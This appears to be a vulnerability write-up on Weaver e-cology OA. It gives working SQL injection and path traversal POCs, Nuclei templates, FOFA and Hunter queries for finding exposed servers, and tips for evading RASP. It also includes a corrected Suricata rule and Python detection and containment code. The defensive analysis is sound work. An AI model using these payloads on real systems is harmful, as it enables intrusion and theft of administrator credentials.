Because the Weaver (泛微) OA instance has RASP enabled, the second time the same injected statement is executed it is blocked, so each request has to be varied (different spacing, comments, delay values) rather than replayed verbatim. The bypass request given:
POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36
Co...
Nuclei template fragment (head of the template truncated in the source; only the tail of the tags line, "sqli", survives). A Content-Type header has been added so the container parses the form body as request parameters:
requests:
  # Content-Type added: without it the servlet container does not parse fileid from the body
  - raw:
      - |
        POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9
        Connection: close
        Content-Type: application/x-www-form-urlencoded

        fileid=2+WAITFOR DELAY+'0:0:5'&isFromOutImg=1

    matchers:
      - type: dsl
        dsl:
          - '...
Suricata-style detection rule. As given on the page it had three defects: the content keyword is a literal match, so the backslash-escaped dots are invalid; the body contents had no buffer modifier and so matched the raw TCP payload rather than the HTTP client body; and the pcre only looked for "select", which does not match the WAITFOR DELAY payload used in the template above. Corrected rule:
alert http any any -> any any (msg:"Weaver E-Cology FileDownloadForOutDoc SQLi"; flow:established,to_server; content:"weaver.file.FileDownloadForOutDoc"; http_uri; content:"isFromOutImg=1"; http_client_body; content:"fileid="; http_client_body; pcre:"/fileid=[^&]*\b(select|union|waitfor|sleep)\b/Pi"; classtype:web-application-attack; sid:1000002; rev:1;)
Caveat: the http_client_body buffer is not URL-decoded, so a percent-encoded keyword (for example %57AITFOR) slips past the pcre; decoding and normalisation have to happen in the WAF or application layer, not in this signature.
Vulnerability reproduction
FOFA query: app="泛微-协同办公OA"
Hunter (鹰图) query: app.name="泛微 e-cology 9.0 OA"
Login page: (screenshot not carried over from the original)
POC: /weaver/ln.FileDownload?fpath=../ecology/WEB-INF/web.xml
The fpath parameter is joined to the download directory without a containment check, so a relative path walks out of it; web.xml is chosen because it exists on every deployment and confirms the read.
Nuclei batch YAML file:
id: ecology-filedownload-directory-traversal
info:
  name: Ecology-LocalFileInclusion
  author: princechaddha
  severity: high
  ...
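The containment check a download handler such as ln.FileDownload needs is shown below. This is an added example written for this page, not Weaver's code and not from the nuclei template; the base directory /var/ecology/filesystem and the probe file names are assumptions for illustration, and the traversal variants are constructed inputs. It goes beyond the single POC by also handling URL-encoded, double-encoded, absolute and backslash forms.

```python
"""
Added example (not from the original page or from Weaver): a containment check
for an untrusted fpath parameter, so that ../ecology/WEB-INF/web.xml and its
encoded variants cannot leave the download directory.
"""
from pathlib import Path
from urllib.parse import unquote


class TraversalError(ValueError):
    """Raised when fpath would resolve outside the download directory."""


def safe_resolve(base_dir: str, fpath: str) -> Path:
    """Map an untrusted fpath onto a file inside base_dir, or raise.

    - decode twice, because %252e%252e%252f style double encoding is common
    - refuse NUL bytes, absolute paths and backslashes (Windows separators)
    - resolve '..' and symlinks before comparing with the base directory
    """
    decoded = unquote(unquote(fpath))
    if "\x00" in decoded or "\\" in decoded or decoded.startswith("/"):
        raise TraversalError(f"rejected: {fpath!r}")
    base = Path(base_dir).resolve()
    target = (base / decoded).resolve()
    # The base directory itself (fpath empty) is not a downloadable file either.
    if base not in target.parents:
        raise TraversalError(f"escapes base dir: {fpath!r}")
    return target


def is_allowed(base_dir: str, fpath: str) -> bool:
    """True if fpath stays inside base_dir, False if it would traverse out."""
    try:
        safe_resolve(base_dir, fpath)
        return True
    except TraversalError:
        return False


BASE_DIR = "/var/ecology/filesystem"  # assumed download root for this example

# Constructed probes: the page's POC, encoded variants, and one legitimate name.
PROBES = {
    "legit": "2023/report.pdf",
    "page_poc": "../ecology/WEB-INF/web.xml",
    "url_encoded": "..%2fecology%2fWEB-INF%2fweb.xml",
    "double_encoded": "%252e%252e%252fecology%252fWEB-INF%252fweb.xml",
    "absolute": "/etc/passwd",
    "backslash": "..\\ecology\\WEB-INF\\web.xml",
    "nested_dots": "docs/../../ecology/WEB-INF/web.xml",
}


def check_all(base_dir: str = BASE_DIR) -> dict:
    """Run every probe through is_allowed; only 'legit' should come back True."""
    return {name: is_allowed(base_dir, p) for name, p in PROBES.items()}


if __name__ == "__main__":
    for name, ok in check_all().items():
        print(f"{name:15s} {'allowed' if ok else 'blocked'}")
```

The comparison is done on fully resolved paths rather than on the string "..", which is why the nested_dots probe (a directory that exists followed by two parent hops) is caught without any pattern list.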
Weaver OA V8 has a pre-authentication SQL injection through which an attacker can obtain administrator privileges and, from there, control of the server.
Affected version: 泛微OA V8
Vulnerability reproduction
FOFA query: app="泛微-协同办公OA"
POC: /js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20password%20as%20id%20from%20HrmResourceManager ...
The sql parameter (here decoding to select password as id from HrmResourceManager) is handed to the database as-is, so the response returns the administrator password hash as the id field.
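The following is an added example, not code from the original page or from any of the tools it quotes. It applies one normalising check to both injection points described on this page (the fileid body parameter of FileDownloadForOutDoc and the sql query parameter of getdata.jsp), and shows why the comment, case and encoding variations used to get past RASP, or a signature keyed only on "select", do not help once the value is decoded and canonicalised first. All sample requests are constructed for this example; the endpoint-to-parameter table is taken from the page's POCs.

```python
"""
Added example (not from the original page): decode-and-normalise check for the
two Weaver E-Cology SQL injection endpoints described above, run over a few
constructed HTTP requests.
"""
import re
from urllib.parse import parse_qs, urlsplit, unquote_plus

# Endpoint -> parameter that the page's POCs show reaching SQL.
WATCHED = {
    "/weaver/weaver.file.FileDownloadForOutDoc": "fileid",
    "/js/hrm/getdata.jsp": "sql",
}

# Keywords that never belong in a numeric file id and that, for getdata.jsp,
# reveal a free-form query being executed.
SQL_TOKENS = re.compile(
    r"\b(select|union|waitfor|delay|sleep|benchmark|insert|update|delete|exec|xp_cmdshell)\b"
)


def normalise(value: str) -> str:
    """Canonicalise an injected value before matching.

    Double-decode (%2520 style), strip /* */ and -- comments, collapse
    whitespace and lower-case, so 2/**/WAITFOR/**/DELAY and 2+waitfor delay
    compare equal.
    """
    v = unquote_plus(unquote_plus(value))
    v = re.sub(r"/\*.*?\*/", " ", v, flags=re.S)
    v = re.sub(r"--[^\n]*", " ", v)
    return re.sub(r"\s+", " ", v).strip().lower()


def parse_request(raw: str):
    """Split a raw HTTP request into (path, merged query+body parameters)."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line = head.split("\r\n", 1)[0]
    _, target, _ = request_line.split(" ", 2)
    parts = urlsplit(target)
    params = parse_qs(parts.query, keep_blank_values=True)
    for k, vs in parse_qs(body, keep_blank_values=True).items():
        params.setdefault(k, []).extend(vs)
    return parts.path, params


def inspect(raw: str) -> list:
    """Return findings for one raw request (empty list when clean)."""
    path, params = parse_request(raw)
    param = WATCHED.get(path)
    if param is None:
        return []
    findings = []
    for value in params.get(param, []):
        norm = normalise(value)
        hits = sorted(set(SQL_TOKENS.findall(norm)))
        if hits:
            findings.append({"path": path, "param": param, "normalised": norm, "tokens": hits})
    return findings


# Constructed samples: the nuclei payload, a comment/case/encoding-mutated
# variant of the kind the RASP-bypass note calls for, the getdata.jsp POC,
# and a benign download.
SAMPLES = {
    "nuclei_poc": (
        "POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1\r\n"
        "Host: target\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\n"
        "fileid=2+WAITFOR DELAY+'0:0:5'&isFromOutImg=1"
    ),
    "mutated": (
        "POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1\r\n"
        "Host: target\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\n"
        "fileid=2/**/wAiTfOr/**/dElAy/**/%270%3a0%3a7%27&isFromOutImg=1"
    ),
    "getdata_poc": (
        "GET /js/hrm/getdata.jsp?cmd=getSelectAllId"
        "&sql=select%20password%20as%20id%20from%20HrmResourceManager HTTP/1.1\r\n"
        "Host: target\r\n\r\n"
    ),
    "benign": (
        "POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1\r\n"
        "Host: target\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\n"
        "fileid=2017&isFromOutImg=1"
    ),
}


def scan_all() -> dict:
    """Inspect every sample; returns name -> findings."""
    return {name: inspect(raw) for name, raw in SAMPLES.items()}


if __name__ == "__main__":
    for name, findings in scan_all().items():
        print(name, "->", findings or "clean")
```

The mutated request and the original nuclei payload normalise to the same string apart from the delay value, which is the property a RASP or WAF needs if it is to block the second attempt even though the bytes differ. A check that only looks for "select" flags the getdata.jsp request and misses both FileDownloadForOutDoc samples.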